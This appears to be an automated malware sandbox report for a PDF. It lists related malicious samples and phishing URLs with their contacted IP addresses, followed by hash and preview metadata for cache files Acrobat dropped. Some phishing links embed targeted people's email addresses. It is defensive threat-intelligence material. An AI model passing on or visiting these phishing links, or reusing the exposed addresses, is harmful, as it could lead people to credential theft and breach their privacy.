                                                                                        http://url969.uniteddeleverycompany.com/ls/click?upn=u001.H7qy8CwvNpiem-2Bf7DeMFk7YJf68sOidxEWakApUPIOSZg2OY8dbdpgPNdKDwG5r9FFRxGTcDR4Y40gkedjWn5gmaEy2hdp5PhuemKZpyV0zDF4yZB1nSDE1glVUHkAxvk-2Bay1ScD58FIOgYpgYP6N0ScK3-2BfYjxiyiX8IVVnDpwETyB9eFyZIpVwHB3s73fG91OsUU5I5qElZ5zc-2F019KUvyyM6RxeXMegmcNjDutTA-2FnxufBtCMFX4wRkoDOM-2BzzsCiJIoY1mc9q42wLMHiq-2B4vv2-2FqoR1f2l-2BCmuACM5q-2FNbDZQstkQL5-2FH30fC7m19Rn-2BlXgwexRgjH0XwyNE8I2tRC8iv5uAUiLQk1AD6k0bLjsvdQWk9bfnh9YPL7n6nCIBdvs55pyxgyRAhb2C3g-3D-3DzLOu_oNIH2-2FxJ-2FTe1FaVJ1jWIKVy-2BRH8quBB-2F7-2FAZY1zuBa8sYO3A2kRlNC5SRLFjReRDbNAqQc8ija5eyvb3hMHW2LijdhuT99ojcYbvfeVDR6TjM8Iqq-2F4lpz7WKfkjLfs8kULSyk-2BJ2FHXElRwIq2EjJuur8G9AAw0HjpCQ3JV-2F1d4REvZ-2BdaWGeRZa46RgdqnKhZwT4HPC-2Fcr9dZBwLnURfD1x7OZfW9R3B1ZDWRdH1V-2F-2BR-2FWmM6h4NEHHRb9NNBhFNZPaY6piFBOFNOupA2OrFLOTElocKhsbRyDVGAbiBMte7-2BAjR-2BA2H-2F9CP2UREBvDHXsH-2BmlqvAryDrKjjAy8lTbA9nho9WLS1JKeGns5pAqmjv-2FPH8p3m8V8tFEPj2WLqfG6IzXwKcOMYvSrGYkMWMsBKmgc-2Bt-2BOg9a0jxMR-2BByynWcTgKhB44PNmoRQfd9lvEhtXtJnUleVDwJMZbPw60p1K6oxTexhzM9ScXx7kCprkCgMgcfi8rgis43afOn4xM8YRcMg9tIzu64CU7VuKJ-2BMFN5I78-2B8KPrNOjHK5o6ri9rwGpR8XbmEC-2BUi0PISrd7M-2BHCYWlP2o1TBL2OAmqufIzKPL-2F0NYk7NCFq-2BQEFmracNk-2BqqlMZ00PhqEs2JN98lsOxQ6MUbXZMcj-2FhqVBZVN97wkN60D56kJ-2FOQiaa7gW2IP4afUKBiy9Wl-2B0h0QTfxVEz3DZUlxRmNpooAbQL5Uk9Km4liDjAnP-2F9rKBZSc3OZEf33ZNLDn8jMDI2p9XCpZ-2BdDlLCTUAgCLNK0FE-2BJVvF9LYHxIrcC8tpkLszOdDeZHX2xcWm6Lc3y7tQCdb1uaEkAxyHmalygulTA8ODCE0Qj21BBKduU8fdD8C7u4Nqc-2BpJjM-2FhEfOBaq9vq0rNhSs4OVsJ7hESECV5WQ-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 18.161.111.117
                                                                                        https://iemetodista.com.br/?data=c2VydmljZUBqcHBsdXMuY29tGet hashmaliciousUnknownBrowse
                                                                                        • 13.227.8.72
                                                                                        https://www.bing.com/ck/a?!&&p=b3ddcc612c5f63024f18df0521265aa33742187d0b01744f07bf6348af8f753eJmltdHM9MTczMzE4NDAwMA&ptn=3&ver=2&hsh=4&fclid=26e9525e-8a77-6109-2437-46988be9608d&psq=superpitmachinery.com&u=a1aHR0cHM6Ly9zdXBlcnBpdG1hY2hpbmVyeS5jb20v&ntb/#fi-weixiang.ong@falconincorporation.comGet hashmaliciousUnknownBrowse
                                                                                        • 13.227.8.65
                                                                                        Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                                                        • 13.227.8.47
                                                                                        Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.72
                                                                                        https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.64
                                                                                        https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.64
                                                                                        api.ipify.org1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.12.205
                                                                                        jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        enyi.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        proforma invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        x.ps1Get hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                        • 104.26.12.205
                                                                                        file.exeGet hashmaliciousQuasarBrowse
                                                                                        • 104.26.13.205
                                                                                        Xeno Executor.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousAmadey, CredGrabber, LummaC Stealer, Meduza Stealer, Stealc, VidarBrowse
                                                                                        • 172.67.74.152
                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.12.205
                                                                                        malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                                                                                        • 172.67.74.152
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSRevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        W7ZBbzV7A5.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.3.46
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        https://maya-lopez.filemail.com/t/BLFGBJSQGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        BPzptjK1aF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.139.78
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.16.9
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        https://mpleho.com/wd/Get hashmaliciousPhisherBrowse
                                                                                        • 104.21.56.67
                                                                                        CLOUDFLARENETUSRevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.20.4.235
                                                                                        https://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        W7ZBbzV7A5.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.3.46
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        https://maya-lopez.filemail.com/t/BLFGBJSQGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.17.25.14
                                                                                        BPzptjK1aF.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.139.78
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                        • 104.21.16.9
                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 104.21.67.152
                                                                                        https://mpleho.com/wd/Get hashmaliciousPhisherBrowse
                                                                                        • 104.21.56.67
                                                                                        ALABANZA-BALTUSarm.elfGet hashmaliciousMiraiBrowse
                                                                                        • 65.108.192.85
                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 65.109.107.240
                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 208.56.163.168
                                                                                        pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                                        • 208.56.82.129
                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 208.56.49.79
                                                                                        sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                        • 65.109.175.1
                                                                                        Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • 65.109.23.226
                                                                                        Delivery_Notification_000275578.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • 65.109.23.226
                                                                                        Champaca-RFQ-1403.scr.exeGet hashmaliciousPureLog StealerBrowse
                                                                                        • 65.108.24.104
                                                                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                        • 216.147.99.196
                                                                                        AMAZON-02UShttps://zfrmz.com/wE0Jw9HNvGeKZ1fn5cBUGet hashmaliciousUnknownBrowse
                                                                                        • 108.158.75.18
                                                                                        AWB_5771388044 Documente de expediere.exeGet hashmaliciousFormBookBrowse
                                                                                        • 13.248.169.48
                                                                                        lLNOwu1HG4.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                        • 185.166.143.50
                                                                                        iVH355vnza.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50
                                                                                        m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                        • 54.217.10.153
                                                                                        mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                        • 34.249.145.219
                                                                                        Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                        • 18.153.246.29
                                                                                        W-2Updated.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                        • 13.227.8.87
                                                                                        la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                        • 54.171.230.55
                                                                                        https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.227.8.47
                                                                                        No context
                                                                                        No context
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.209840821412757
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEuN+q2P92nKuAl9OmbnIFUt8dEoZZmw+dEoNVkwO92nKuAl9OmbjLJ:g2v4HAahFUt8dV/+dH5LHAaSJ
                                                                                        MD5:FA4DB2233AB849EE0C705C31C5FA310B
                                                                                        SHA1:1237A7C341F44CFBBDD811AF97E9536ABB2F2611
                                                                                        SHA-256:9457596495888A72F7EED6073D25142F0C4FA1E79D2CEA99A301B56CA95CB0C2
                                                                                        SHA-512:D52B54805A121D1698BFEE7006B18F53BDBABA69BFC2314BBC5B011AC15C2D5C2B9B6862815D878E05813680B20145E362513DD9C6F2EE71264C5A59884F3D93
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/09-11:46:54.280 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-11:46:54.282 1c18 Recovering log #3.2024/12/09-11:46:54.282 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):294
                                                                                        Entropy (8bit):5.209840821412757
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEuN+q2P92nKuAl9OmbnIFUt8dEoZZmw+dEoNVkwO92nKuAl9OmbjLJ:g2v4HAahFUt8dV/+dH5LHAaSJ
                                                                                        MD5:FA4DB2233AB849EE0C705C31C5FA310B
                                                                                        SHA1:1237A7C341F44CFBBDD811AF97E9536ABB2F2611
                                                                                        SHA-256:9457596495888A72F7EED6073D25142F0C4FA1E79D2CEA99A301B56CA95CB0C2
                                                                                        SHA-512:D52B54805A121D1698BFEE7006B18F53BDBABA69BFC2314BBC5B011AC15C2D5C2B9B6862815D878E05813680B20145E362513DD9C6F2EE71264C5A59884F3D93
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/09-11:46:54.280 1c18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/09-11:46:54.282 1c18 Recovering log #3.2024/12/09-11:46:54.282 1c18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):338
                                                                                        Entropy (8bit):5.187638288475152
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEFQ+q2P92nKuAl9Ombzo2jMGIFUt8dETDgZmw+dETDQVkwO92nKuAl9Ombzo2jz:gP+v4HAa8uFUt8dZ/+dNV5LHAa8RJ
                                                                                        MD5:C10CA5B39C9C337DB5ADC16E3C47E9AB
                                                                                        SHA1:77DC69DCC637C3624C5E27D58A45BF44CD41E2A8
                                                                                        SHA-256:95A745A6F2B877F530E76D61465D1A5D2D31CDE2D91B47F2D56AAB32C54382A3
                                                                                        SHA-512:97F748AC196FAF229B2DEE32C97F073DA3A9CAA6910F34ED84EA3277D28EE985B29D964057ABE61EFE7F719741F27FFC5A08E38FAE6783968A6B4D5023579D3C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/09-11:46:54.334 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-11:46:54.336 1cdc Recovering log #3.2024/12/09-11:46:54.336 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):338
                                                                                        Entropy (8bit):5.187638288475152
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEFQ+q2P92nKuAl9Ombzo2jMGIFUt8dETDgZmw+dETDQVkwO92nKuAl9Ombzo2jz:gP+v4HAa8uFUt8dZ/+dNV5LHAa8RJ
                                                                                        MD5:C10CA5B39C9C337DB5ADC16E3C47E9AB
                                                                                        SHA1:77DC69DCC637C3624C5E27D58A45BF44CD41E2A8
                                                                                        SHA-256:95A745A6F2B877F530E76D61465D1A5D2D31CDE2D91B47F2D56AAB32C54382A3
                                                                                        SHA-512:97F748AC196FAF229B2DEE32C97F073DA3A9CAA6910F34ED84EA3277D28EE985B29D964057ABE61EFE7F719741F27FFC5A08E38FAE6783968A6B4D5023579D3C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:2024/12/09-11:46:54.334 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/09-11:46:54.336 1cdc Recovering log #3.2024/12/09-11:46:54.336 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):508
                                                                                        Entropy (8bit):5.047195090775108
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                        MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                        SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                        SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                        SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):508
                                                                                        Entropy (8bit):5.047195090775108
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                        MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                        SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                        SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                        SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):508
                                                                                        Entropy (8bit):5.047195090775108
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                        MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                        SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                        SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                        SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:JSON data
                                                                                        Category:modified
                                                                                        Size (bytes):508
                                                                                        Entropy (8bit):5.061685229355718
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YH/um3RA8sqNrsBdOg2HCfcaq3QYiubxnP7E4TfF+:Y2sRdsyMdMHCu3QYhbxP7np+
                                                                                        MD5:49C0C28430E58B5C5D31A3C0A3EB2262
                                                                                        SHA1:95B455718C1AE1FA9D3245FCE1A554628765D4B1
                                                                                        SHA-256:4ADB6AB09D07DEEBF1C2B24244B1F0FA290FF04A63134B32D0C635DB18FCA46A
                                                                                        SHA-512:7A9FF7C8E82BDA2D77DDC801EE0E13C10B6220C024C0DFFCCFE56ACEDBD3A6B9708C15F8526E96E61AB698AF3FAF33D2F76BCAB7EDEC13E07A35C85BAE8D1B5A
                                                                                        Malicious:false
                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378322827154605","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":596024},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):4509
                                                                                        Entropy (8bit):5.228193913219141
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUEb/hiR6Z:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLz
                                                                                        MD5:5E74914F1F97C42302927E23E86731C9
                                                                                        SHA1:8D2C0D5918AEDF1659EC6677C6BFB0CC93B9A657
                                                                                        SHA-256:0FAB73D9581F7CDC970FB47466EB2AD0EC55D15B61067B354A5C3FC3D842C2C9
                                                                                        SHA-512:19672793578E78E97F490998BE81C910530A3B0515ADF31C76DD38509221830AB0BF3612C1F2E6C45131E153920FABFA467A5E6101F41DA359B5F0B49B65CB80
                                                                                        Malicious:false
                                                                                        Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):5.2265922557725295
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEIdQ+q2P92nKuAl9OmbzNMxIFUt8dEIrgZmw+dEIGQVkwO92nKuAl9OmbzNMFLJ:gs+v4HAa8jFUt8dS/+d1V5LHAa84J
                                                                                        MD5:60F12255324BE906FCA6FA5FC3C79D96
                                                                                        SHA1:56819CD8CFB40D4C10AE540D26AB670D04171646
                                                                                        SHA-256:625FBDB76FB98FD625DB39AA160C0EA695865592431116B248054CDFA100B7AC
                                                                                        SHA-512:BE9B0ADD4588F71A865294A4D8955B92F5806F87C811D26E05361E9A03B89A2BF4FDA3E95365EB59F53B0FF1046562D0A2F5F550A368F2A35431C050F956622D
                                                                                        Malicious:false
                                                                                        Preview:2024/12/09-11:46:54.476 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-11:46:54.478 1cdc Recovering log #3.2024/12/09-11:46:54.479 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):326
                                                                                        Entropy (8bit):5.2265922557725295
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:gEIdQ+q2P92nKuAl9OmbzNMxIFUt8dEIrgZmw+dEIGQVkwO92nKuAl9OmbzNMFLJ:gs+v4HAa8jFUt8dS/+d1V5LHAa84J
                                                                                        MD5:60F12255324BE906FCA6FA5FC3C79D96
                                                                                        SHA1:56819CD8CFB40D4C10AE540D26AB670D04171646
                                                                                        SHA-256:625FBDB76FB98FD625DB39AA160C0EA695865592431116B248054CDFA100B7AC
                                                                                        SHA-512:BE9B0ADD4588F71A865294A4D8955B92F5806F87C811D26E05361E9A03B89A2BF4FDA3E95365EB59F53B0FF1046562D0A2F5F550A368F2A35431C050F956622D
                                                                                        Malicious:false
                                                                                        Preview:2024/12/09-11:46:54.476 1cdc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/09-11:46:54.478 1cdc Recovering log #3.2024/12/09-11:46:54.479 1cdc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                        Category:dropped
                                                                                        Size (bytes):65110
                                                                                        Entropy (8bit):1.0692033635914164
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:0ByQkKmrMtx3AvSQg5fae+Gci7vwGLEloj911MaLlzLRGav7djvz1+:0+wtSvSQSye+2vjEyZ1SaLlzHvhjbU
                                                                                        MD5:C5FE30D0A1FB6AED334581D9EC6B7931
                                                                                        SHA1:C1A51FBA6BAD37FABABC7BE57B9E99E9F8B0542B
                                                                                        SHA-256:A244C7603880DB4C09A143B6F29E00392A097CCCCB3DE52045B87857187A4DE3
                                                                                        SHA-512:FE2CA50FC6E78300D3232D5A682C89CDEDED74E5AAB8D69140B76E348D43141488278D223C6623E7718A58704274E313EB6124FB1DD76C29EE7989192BA88100
                                                                                        Malicious:false
                                                                                        Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:Certificate, Version=3
                                                                                        Category:dropped
                                                                                        Size (bytes):1391
                                                                                        Entropy (8bit):7.705940075877404
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                        Malicious:false
